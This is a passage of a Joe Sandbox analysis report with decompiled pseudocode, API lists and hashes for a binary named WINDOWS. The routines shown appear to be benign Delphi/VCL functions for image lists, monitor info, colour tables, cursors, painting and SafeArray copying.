                                                    
                                                    				_t45 = _t46;
                                                    				_push(__ebx);
                                                    				_t43 = __edx;
                                                    				_t28 = __eax;
                                                    				if( *0x49eba0 == 0) {
                                                    					 *0x49eba0 = E0040D9DC("comctl32.dll", __eax);
                                                    					if( *0x49eba0 >= 0x60000) {
                                                    						_t41 = GetModuleHandleA("comctl32.dll");
                                                    						if(_t41 != 0) {
                                                    							 *0x49eba4 = GetProcAddress(_t41, "ImageList_WriteEx");
                                                    						}
                                                    					}
                                                    				}
                                                    				_v8 = E00422634(_t43, 1, 0);
                                                    				_push(_t45);
                                                    				_push(0x448ebe);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t46;
                                                    				if( *0x49eba4 == 0) {
                                                    					_t9 = _v8;
                                                    					if(_t9 != 0) {
                                                    						_t9 = _t9 - 0xffffffec;
                                                    					}
                                                    					_push(_t9);
                                                    					_t11 = E00447D0C(_t28);
                                                    					_push(_t11);
                                                    					L0042C4AC();
                                                    					if(_t11 == 0) {
                                                    						_t33 =  *0x49d9c8; // 0x422f10
                                                    						E0040D200(_t33, 1);
                                                    						E00404378();
                                                    					}
                                                    				} else {
                                                    					_t17 = _v8;
                                                    					if(_t17 != 0) {
                                                    						_t17 = _t17 - 0xffffffec;
                                                    					}
                                                    					_push(_t17);
                                                    					_push(1);
                                                    					_push(E00447D0C(_t28));
                                                    					if( *0x49eba4() != 0) {
                                                    						_t34 =  *0x49d9c8; // 0x422f10
                                                    						E0040D200(_t34, 1);
                                                    						E00404378();
                                                    					}
                                                    				}
                                                    				_pop(_t37);
                                                    				 *[fs:eax] = _t37;
                                                    				_push(0x448ec5);
                                                    				return E00403BEC(_v8);
                                                    			}


                                                    APIs
                                                      • Part of subcall function 0040D9DC: 73E714E0.VERSION(00000000,?,00000000,0040DAB2), ref: 0040DA1E
                                                      • Part of subcall function 0040D9DC: 73E714C0.VERSION(00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA53
                                                      • Part of subcall function 0040D9DC: 73E71500.VERSION(?,0040DAC4,?,?,00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA6D
                                                    • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00448DF8
                                                    • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00448E09
                                                    • 739F1DE0.COMCTL32(00000000,?,00000000,00448EBE), ref: 00448E88
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: E714$AddressE71500HandleModuleProc
                                                    • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                    • API String ID: 314815179-3125200627
                                                    • Opcode ID: 07ee34b8be0565e7f1cf5a0c4b1dbc2c1134b74eaf3696c36e383b944ea21b8f
                                                    • Instruction ID: 78786ebc40bd40dec1c5389fa6359cb69700be1fbc3bb7ccab78b7c5a69fbc81
                                                    • Opcode Fuzzy Hash: 07ee34b8be0565e7f1cf5a0c4b1dbc2c1134b74eaf3696c36e383b944ea21b8f
                                                    • Instruction Fuzzy Hash: E3214870A04201ABE710EB7ADD56B6F36A8AB55708B60057FF805E72A2DF7DAC00D61D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 47%
                                                    			E0042C900(intOrPtr _a4, intOrPtr* _a8) {
                                                    				void _v20;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t23;
                                                    				int _t24;
                                                    				intOrPtr _t26;
                                                    				intOrPtr _t27;
                                                    				intOrPtr* _t29;
                                                    				intOrPtr* _t31;
                                                    
                                                    				_t29 = _a8;
                                                    				_t27 = _a4;
                                                    				if( *0x49e92d != 0) {
                                                    					_t24 = 0;
                                                    					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                    						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                    						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                    						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                    						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						_t31 = _t29;
                                                    						 *(_t31 + 0x24) = 1;
                                                    						if( *_t31 >= 0x4c) {
                                                    							_push("DISPLAY");
                                                    							_push(_t31 + 0x28);
                                                    							L00407298();
                                                    						}
                                                    						_t24 = 1;
                                                    					}
                                                    				} else {
                                                    					_t26 =  *0x49e914; // 0x42c900
                                                    					 *0x49e914 = E0042C4FC(5, _t23, _t26, _t27, _t29);
                                                    					_t24 =  *0x49e914(_t27, _t29);
                                                    				}
                                                    				return _t24;
                                                    			}


                                                    APIs
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C958
                                                    • GetSystemMetrics.USER32 ref: 0042C96D
                                                    • GetSystemMetrics.USER32 ref: 0042C978
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C9A2
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfoA
                                                    • API String ID: 2545840971-1370492664
                                                    • Opcode ID: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                    • Instruction ID: f52c56f8859c3bc03712ace229276911b675d95da7c00cdafe0d7f24be773c7c
                                                    • Opcode Fuzzy Hash: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                    • Instruction Fuzzy Hash: 3E11B4F17017249FD720DF61AC84BABB7A8FB4A310F40493FE94597250D375A940C7AA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 47%
                                                    			E0042C9D4(intOrPtr _a4, intOrPtr* _a8) {
                                                    				void _v20;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t23;
                                                    				int _t24;
                                                    				intOrPtr _t26;
                                                    				intOrPtr _t27;
                                                    				intOrPtr* _t29;
                                                    				intOrPtr* _t31;
                                                    
                                                    				_t29 = _a8;
                                                    				_t27 = _a4;
                                                    				if( *0x49e92e != 0) {
                                                    					_t24 = 0;
                                                    					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                    						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                    						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                    						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                    						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						_t31 = _t29;
                                                    						 *(_t31 + 0x24) = 1;
                                                    						if( *_t31 >= 0x4c) {
                                                    							_push("DISPLAY");
                                                    							_push(_t31 + 0x28);
                                                    							L00407298();
                                                    						}
                                                    						_t24 = 1;
                                                    					}
                                                    				} else {
                                                    					_t26 =  *0x49e918; // 0x42c9d4
                                                    					 *0x49e918 = E0042C4FC(6, _t23, _t26, _t27, _t29);
                                                    					_t24 =  *0x49e918(_t27, _t29);
                                                    				}
                                                    				return _t24;
                                                    			}


                                                    APIs
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042CA2C
                                                    • GetSystemMetrics.USER32 ref: 0042CA41
                                                    • GetSystemMetrics.USER32 ref: 0042CA4C
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042CA76
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfoW
                                                    • API String ID: 2545840971-2774842281
                                                    • Opcode ID: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                    • Instruction ID: da6544c83ea616b7bbcbecc7cac92abfbfd15a320570470bed168d46318f2a96
                                                    • Opcode Fuzzy Hash: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                    • Instruction Fuzzy Hash: D11103B1B413289FD760CF61AC84BAFB7A8FB06310F40493BE85597290D375A944CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E00428F38(int __eax, void* __ecx, intOrPtr __edx) {
                                                    				intOrPtr _v8;
                                                    				int _v12;
                                                    				struct HDC__* _v16;
                                                    				void* _v20;
                                                    				struct tagRGBQUAD _v1044;
                                                    				int _t16;
                                                    				struct HDC__* _t18;
                                                    				int _t31;
                                                    				int _t34;
                                                    				intOrPtr _t41;
                                                    				void* _t43;
                                                    				void* _t46;
                                                    				void* _t48;
                                                    				intOrPtr _t49;
                                                    
                                                    				_t16 = __eax;
                                                    				_t46 = _t48;
                                                    				_t49 = _t48 + 0xfffffbf0;
                                                    				_v8 = __edx;
                                                    				_t43 = __eax;
                                                    				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                                    					L4:
                                                    					return _t16;
                                                    				} else {
                                                    					_t16 = E004267F4(_v8, 0xff,  &_v1044);
                                                    					_t34 = _t16;
                                                    					if(_t34 == 0) {
                                                    						goto L4;
                                                    					} else {
                                                    						_push(0);
                                                    						L00407638();
                                                    						_v12 = _t16;
                                                    						_t18 = _v12;
                                                    						_push(_t18);
                                                    						L004072E0();
                                                    						_v16 = _t18;
                                                    						_v20 = SelectObject(_v16, _t43);
                                                    						_push(_t46);
                                                    						_push(0x428fe7);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t49;
                                                    						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
                                                    						_pop(_t41);
                                                    						 *[fs:eax] = _t41;
                                                    						_push(0x428fee);
                                                    						SelectObject(_v16, _v20);
                                                    						DeleteDC(_v16);
                                                    						_t31 = _v12;
                                                    						_push(_t31);
                                                    						_push(0);
                                                    						L00407888();
                                                    						return _t31;
                                                    					}
                                                    				}
                                                    			}


                                                    APIs
                                                      • Part of subcall function 004267F4: GetObjectA.GDI32(?,00000004), ref: 0042680B
                                                      • Part of subcall function 004267F4: 733AAEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,00428F6E), ref: 0042682E
                                                    • 733AAC50.USER32(00000000), ref: 00428F76
                                                    • 733AA590.GDI32(?,00000000), ref: 00428F82
                                                    • SelectObject.GDI32(?), ref: 00428F8F
                                                    • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FB3
                                                    • SelectObject.GDI32(?,?), ref: 00428FCD
                                                    • DeleteDC.GDI32(?), ref: 00428FD6
                                                    • 733AB380.USER32(00000000,?,?,?,?,00428FEE,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FE1
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$Select$A590B380ColorDeleteTable
                                                    • String ID:
                                                    • API String ID: 980243606-0
                                                    • Opcode ID: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                    • Instruction ID: 4e07099c4c205c436fb256934ce996c76079a9fb80c20dbc0557a77875d025fb
                                                    • Opcode Fuzzy Hash: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                    • Instruction Fuzzy Hash: E8116671E052186BDB10EBE9DC41EAEB7BCEB08704F8144BAF904E7281DA789D40C765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E00458714(long __eax, void* __ecx, short __edx) {
                                                    				struct tagPOINT _v24;
                                                    				long _t7;
                                                    				long _t12;
                                                    				long _t19;
                                                    				void* _t21;
                                                    				struct HWND__* _t27;
                                                    				short _t28;
                                                    				void* _t30;
                                                    				struct tagPOINT* _t31;
                                                    
                                                    				_t21 = __ecx;
                                                    				_t7 = __eax;
                                                    				_t31 = _t30 + 0xfffffff8;
                                                    				_t28 = __edx;
                                                    				_t19 = __eax;
                                                    				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
                                                    					L6:
                                                    					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
                                                    				} else {
                                                    					 *((short*)(__eax + 0x44)) = __edx;
                                                    					if(__edx != 0) {
                                                    						L5:
                                                    						_t7 = SetCursor(E004586EC(_t19, _t28));
                                                    						goto L6;
                                                    					} else {
                                                    						GetCursorPos(_t31);
                                                    						_push(_v24.y);
                                                    						_t27 = WindowFromPoint(_v24);
                                                    						if(_t27 == 0) {
                                                    							goto L5;
                                                    						} else {
                                                    							_t12 = GetWindowThreadProcessId(_t27, 0);
                                                    							if(_t12 != GetCurrentThreadId()) {
                                                    								goto L5;
                                                    							} else {
                                                    								_t7 = SendMessageA(_t27, 0x20, _t27, E004079D0(SendMessageA(_t27, 0x84, 0, E00407A64(_t31, _t21)), 0x200));
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t7;
                                                    			}


                                                    APIs
                                                    • GetCursorPos.USER32 ref: 0045872F
                                                    • WindowFromPoint.USER32(?,?), ref: 0045873C
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045874A
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458751
                                                    • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0045876A
                                                    • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00458781
                                                    • SetCursor.USER32(00000000), ref: 00458793
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                    • String ID:
                                                    • API String ID: 1770779139-0
                                                    • Opcode ID: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                    • Instruction ID: 0e129d7b8b93cd0c48e49d674e41586019fec875b1cb266d62cfcabba037c031
                                                    • Opcode Fuzzy Hash: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                    • Instruction Fuzzy Hash: D501AC2660830425E62036754C87F7F2558DF85B65F14453FBA04762C3ED3DAC05936E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 89%
                                                    			E00454268(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr* _v12;
                                                    				struct HDC__* _v16;
                                                    				struct tagPAINTSTRUCT _v80;
                                                    				struct tagRECT _v96;
                                                    				struct tagRECT _v112;
                                                    				signed int _v116;
                                                    				long _v120;
                                                    				void* __ebp;
                                                    				void* _t68;
                                                    				void* _t94;
                                                    				struct HBRUSH__* _t97;
                                                    				intOrPtr _t105;
                                                    				void* _t118;
                                                    				void* _t127;
                                                    				intOrPtr _t140;
                                                    				intOrPtr _t146;
                                                    				void* _t147;
                                                    				void* _t148;
                                                    				void* _t150;
                                                    				void* _t152;
                                                    				intOrPtr _t153;
                                                    
                                                    				_t148 = __esi;
                                                    				_t147 = __edi;
                                                    				_t138 = __edx;
                                                    				_t127 = __ebx;
                                                    				_t150 = _t152;
                                                    				_t153 = _t152 + 0xffffff8c;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_t68 =  *_v12 - 0xf;
                                                    				if(_t68 == 0) {
                                                    					_v16 =  *(_v12 + 4);
                                                    					if(_v16 == 0) {
                                                    						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
                                                    					}
                                                    					_push(_t150);
                                                    					_push(0x454436);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t153;
                                                    					if(_v16 == 0) {
                                                    						GetWindowRect( *(_v8 + 0x254),  &_v96);
                                                    						E0043AAC0(_v8,  &_v120,  &_v96);
                                                    						_v96.left = _v120;
                                                    						_v96.top = _v116;
                                                    						E004398B8( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
                                                    					}
                                                    					E0043F3B8(_v8, _t127, _v12, _t147, _t148);
                                                    					_pop(_t140);
                                                    					 *[fs:eax] = _t140;
                                                    					_push(0x454444);
                                                    					if(_v16 == 0) {
                                                    						return EndPaint( *(_v8 + 0x254),  &_v80);
                                                    					}
                                                    					return 0;
                                                    				} else {
                                                    					_t94 = _t68 - 5;
                                                    					if(_t94 == 0) {
                                                    						_t97 = E00425610( *((intOrPtr*)(_v8 + 0x170)));
                                                    						 *((intOrPtr*)( *_v8 + 0x44))();
                                                    						FillRect( *(_v12 + 4),  &_v112, _t97);
                                                    						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
                                                    							GetClientRect( *(_v8 + 0x254),  &_v96);
                                                    							FillRect( *(_v12 + 4),  &_v96, E00425610( *((intOrPtr*)(_v8 + 0x170))));
                                                    						}
                                                    						_t105 = _v12;
                                                    						 *((intOrPtr*)(_t105 + 0xc)) = 1;
                                                    					} else {
                                                    						_t118 = _t94 - 0x2b;
                                                    						if(_t118 == 0) {
                                                    							E004541DC(_t150);
                                                    							_t105 = _v8;
                                                    							if( *((char*)(_t105 + 0x22f)) == 2) {
                                                    								if(E00454704(_v8) == 0 || E00454228(_t138, _t150) == 0) {
                                                    									_t146 = 1;
                                                    								} else {
                                                    									_t146 = 0;
                                                    								}
                                                    								_t105 = E0045152C( *(_v8 + 0x254), _t146);
                                                    							}
                                                    						} else {
                                                    							if(_t118 != 0x45) {
                                                    								_t105 = E004541DC(_t150);
                                                    							} else {
                                                    								E004541DC(_t150);
                                                    								_t105 = _v12;
                                                    								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                                                    									_t105 = _v12;
                                                    									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    					return _t105;
                                                    				}
                                                    			}
                                                    Addresses:
                                                    0x00454268 0x00454268 0x00454268 0x00454268 0x00454269 0x0045426b 0x0045426e 0x00454271
                                                    0x00454279 0x0045427c 0x0045438c 0x00454393 0x004543ab 0x004543ab 0x004543b0 0x004543b1
                                                    0x004543b6 0x004543b9 0x004543c0 0x004543d0 0x004543de 0x004543e6 0x004543ec 0x004543ff
                                                    0x004543ff 0x0045440a 0x00454411 0x00454414 0x00454417 0x00454420 0x00000000 0x00454430
                                                    0x00454435 0x00454282 0x00454282 0x00454285 0x004542c5 0x004542d3 0x004542e1 0x004542f0
                                                    0x0045430c 0x0045432b 0x0045432b 0x00454330 0x00454333 0x00454287 0x00454287 0x0045428a
                                                    0x00454340 0x00454346 0x00454350 0x00454360 0x00454371 0x0045436d 0x0045436d 0x0045436d
                                                    0x0045437c 0x0045437c 0x00454290 0x00454293 0x0045443e 0x00454299 0x0045429a 0x004542a0
                                                    0x004542a7 0x004542ad 0x004542b0 0x004542b0 0x004542a7 0x00454293 0x0045428a 0x00454447
                                                    0x00454447

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                    • String ID:
                                                    • API String ID: 901200654-0
                                                    • Opcode ID: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                    • Instruction ID: 131b90634cb33abbaab8d9433d3d521d828b3d7b247f4d7e968007ff8c91c40e
                                                    • Opcode Fuzzy Hash: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                    • Instruction Fuzzy Hash: 4651F075E04108EFCB00DB99C549E9DB7F8AB49319F5485A6E808EB352D738AE85DB08
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 77%
                                                    			E00410B94(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                                    				char _v260;
                                                    				char _v768;
                                                    				char _v772;
                                                    				short* _v776;
                                                    				intOrPtr _v780;
                                                    				char _v784;
                                                    				signed int _v788;
                                                    				signed short* _v792;
                                                    				char _v796;
                                                    				char _v800;
                                                    				intOrPtr* _v804;
                                                    				void* __ebp;
                                                    				signed char _t47;
                                                    				signed int _t54;
                                                    				void* _t62;
                                                    				intOrPtr* _t73;
                                                    				intOrPtr* _t91;
                                                    				void* _t93;
                                                    				void* _t95;
                                                    				void* _t98;
                                                    				void* _t99;
                                                    				intOrPtr* _t108;
                                                    				void* _t112;
                                                    				intOrPtr _t113;
                                                    				char* _t114;
                                                    				void* _t115;
                                                    
                                                    				_t100 = __ecx;
                                                    				_v780 = __ecx;
                                                    				_t91 = __edx;
                                                    				_v776 = __eax;
                                                    				if(( *(__edx + 1) & 0x00000020) == 0) {
                                                    					E00410638(0x80070057);
                                                    				}
                                                    				_t47 =  *_t91;
                                                    				if((_t47 & 0x00000fff) != 0xc) {
                                                    					_push(_t91);
                                                    					_push(_v776);
                                                    					L0040F328();
                                                    					return E00410638(_v776);
                                                    				} else {
                                                    					if((_t47 & 0x00000040) == 0) {
                                                    						_v792 =  *((intOrPtr*)(_t91 + 8));
                                                    					} else {
                                                    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                                                    					}
                                                    					_v788 =  *_v792 & 0x0000ffff;
                                                    					_t93 = _v788 - 1;
                                                    					if(_t93 < 0) {
                                                    						L9:
                                                    						_push( &_v772);
                                                    						_t54 = _v788;
                                                    						_push(_t54);
                                                    						_push(0xc);
                                                    						L0040F784();
                                                    						_t113 = _t54;
                                                    						if(_t113 == 0) {
                                                    							E00410390(_t100);
                                                    						}
                                                    						E004109E8(_v776);
                                                    						 *_v776 = 0x200c;
                                                    						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                                    						_t95 = _v788 - 1;
                                                    						if(_t95 < 0) {
                                                    							L14:
                                                    							_t97 = _v788 - 1;
                                                    							if(E00410B08(_v788 - 1, _t115) != 0) {
                                                    								L0040F79C();
                                                    								E00410638(_v792);
                                                    								L0040F79C();
                                                    								E00410638( &_v260);
                                                    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                    							}
                                                    							_t62 = E00410B38(_t97, _t115);
                                                    						} else {
                                                    							_t98 = _t95 + 1;
                                                    							_t73 =  &_v768;
                                                    							_t108 =  &_v260;
                                                    							do {
                                                    								 *_t108 =  *_t73;
                                                    								_t108 = _t108 + 4;
                                                    								_t73 = _t73 + 8;
                                                    								_t98 = _t98 - 1;
                                                    							} while (_t98 != 0);
                                                    							do {
                                                    								goto L14;
                                                    							} while (_t62 != 0);
                                                    							return _t62;
                                                    						}
                                                    					} else {
                                                    						_t99 = _t93 + 1;
                                                    						_t112 = 0;
                                                    						_t114 =  &_v772;
                                                    						do {
                                                    							_v804 = _t114;
                                                    							_push(_v804 + 4);
                                                    							_t18 = _t112 + 1; // 0x1
                                                    							_push(_v792);
                                                    							L0040F78C();
                                                    							E00410638(_v792);
                                                    							_push( &_v784);
                                                    							_t21 = _t112 + 1; // 0x1
                                                    							_push(_v792);
                                                    							L0040F794();
                                                    							E00410638(_v792);
                                                    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                    							_t112 = _t112 + 1;
                                                    							_t114 = _t114 + 8;
                                                    							_t99 = _t99 - 1;
                                                    						} while (_t99 != 0);
                                                    						goto L9;
                                                    					}
                                                    				}
                                                    			}
                                                    Addresses:
                                                    0x00410b94 0x00410ba0 0x00410ba6 0x00410ba8 0x00410bb2 0x00410bb9 0x00410bb9 0x00410bbe
                                                    0x00410bcc 0x00410d45 0x00410d4c 0x00410d4d 0x00000000 0x00410bd2 0x00410bd5 0x00410be7
                                                    0x00410bd7 0x00410bdc 0x00410bdc 0x00410bf6 0x00410c02 0x00410c05 0x00410c72 0x00410c78
                                                    0x00410c79 0x00410c7f 0x00410c80 0x00410c82 0x00410c87 0x00410c8b 0x00410c8d 0x00410c8d
                                                    0x00410c98 0x00410ca3 0x00410cae 0x00410cb7 0x00410cba 0x00410cd6 0x00410cdd 0x00410ce8
                                                    0x00410cff 0x00410d04 0x00410d18 0x00410d1d 0x00410d30 0x00410d30 0x00410d39 0x00410cbc
                                                    0x00410cbc 0x00410cbd 0x00410cc3 0x00410cc9 0x00410ccb 0x00410ccd 0x00410cd0 0x00410cd3
                                                    0x00410cd3 0x00410cd6 0x00000000 0x00000000 0x00000000 0x00410cd6 0x00410c07 0x00410c07
                                                    0x00410c08 0x00410c0a 0x00410c10 0x00410c12 0x00410c21 0x00410c22 0x00410c2c 0x00410c2d
                                                    0x00410c32 0x00410c3d 0x00410c3e 0x00410c48 0x00410c49 0x00410c4e 0x00410c69 0x00410c6b
                                                    0x00410c6c 0x00410c6f 0x00410c6f 0x00000000 0x00410c10 0x00410c05

                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410C2D
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410C49
                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00410C82
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410CFF
                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410D18
                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 00410D4D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                    • String ID:
                                                    • API String ID: 351091851-0
